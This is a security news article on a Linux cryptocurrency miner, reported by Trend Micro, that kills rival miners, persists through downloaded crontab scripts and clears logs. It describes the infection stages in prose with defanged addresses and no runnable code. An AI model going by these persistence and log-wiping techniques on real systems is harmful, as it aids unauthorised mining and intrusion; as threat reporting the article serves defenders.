Cryptocurrency miner removes other malware in bid to make more money

News by Rene Millman

Malware targets Linux machines and removes competing cryptocurrency miners and malware which would slow down the machine, researchers say.

Malware battling over control of your system is not good (Pic: Iain Donald Smith/Getty Images)

Malware has been discovered that infects Linux systems to install a cryptocurrency miner while also removing other malware and coinminers present on the system.

According to a blog post by security researchers at Trend Micro, the malware installs  the XMR-Stak Cryptonight cryptocurrency miner. They also found a script capable of deleting a number of known Linux malware, coin miners and connections to other miner services and ports.

The coinminer shares some code with Xbash malware as well as being closely related to the Korkerds cryptocurrency miner. The code installs a cryptocurrency-mining malware as well as implanting itself into the system and crontabs to continue despite reboots and deletions.

According to Trend Micro, the infection’s second stage starts from some IP cameras and web services via TCP port 8161, where the attacker tries to upload a crontab file.

It also downloads a crontab that downloads and runs shell script 1.jpg, enabling three functions named and identified by the attackers.

Function B kills previously installed malware, coin miners and all related services referenced to an accompanying malware (detected by Trend Micro as Trojan.SH.MALXMR.UWEIU). It also creates new directories, files and stop processes with connections to identified IP addresses.

Function D downloads the coin miner binary from hxxp:// and runs it.

Function C downloads a script from hxxp://, saves it to /usr/local/bin/dns file, and creates a new crontab to call this script at 1am. It also downloads hxxp:// and puts it in different crontabs.

The malware then clears system logs in a bid to erase its path.

Security researchers added that when compared to a Korkreds sample, this script simplifies the routine to downloading and executing the files, followed by installing the coinminer into the system.

"Looking into its propagation routine, a majority of the codes were also taken from the KORKERDS script, as the codes are still available online with Base64 encoding via hxxps:// We noted the subtle difference in the absence of the link placed in between the PUT URL /fileserver/vMROB4ZhfLTljleL and the actual crontab," said researchers.

The new script inserts just one crontab that fetches all the code and the miner, compared with Korkreds which saves the crontab directly.

Researchers said that removing competing malware is just one way cyber-criminals are maximising their profit.

"Enterprises can protect themselves from various kinds of evolving attacks by making sure their systems have downloaded the latest patches released by legitimate vendors. Cryptocurrency-mining malware or coin miners use CPU and GPU resources, making systems run slowly," said researchers.

Despite removing other coinminers and malware, this new threat should not be seen as benign.

Naaman Hart, managed security services engineer at Digital Guardian, told SC Media UK that it’s never worth letting one piece of malware exist even if it has tangible benefits.  

"It’s the equivalent of taking a vaccination off someone in the pub. It may have benefits, sure, but it might also carry something far more dangerous hidden within it. Removing all malware is the best policy," he said.

Paul Ducklin, senior technologist at Sophos, told SC that sometimes it's an excuse that lets a malware writer claim to be 'doing some good' – "a bit like beating someone up but claiming you're a humanitarian because you called an ambulance before running away – and sometimes, as in this case, it's criminal competition, plain and simple. The more CPU power a coinminer gets, the more mining it can do, so killing another cybergang's malware helps the crooks increase their earnings." 

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Video and interviews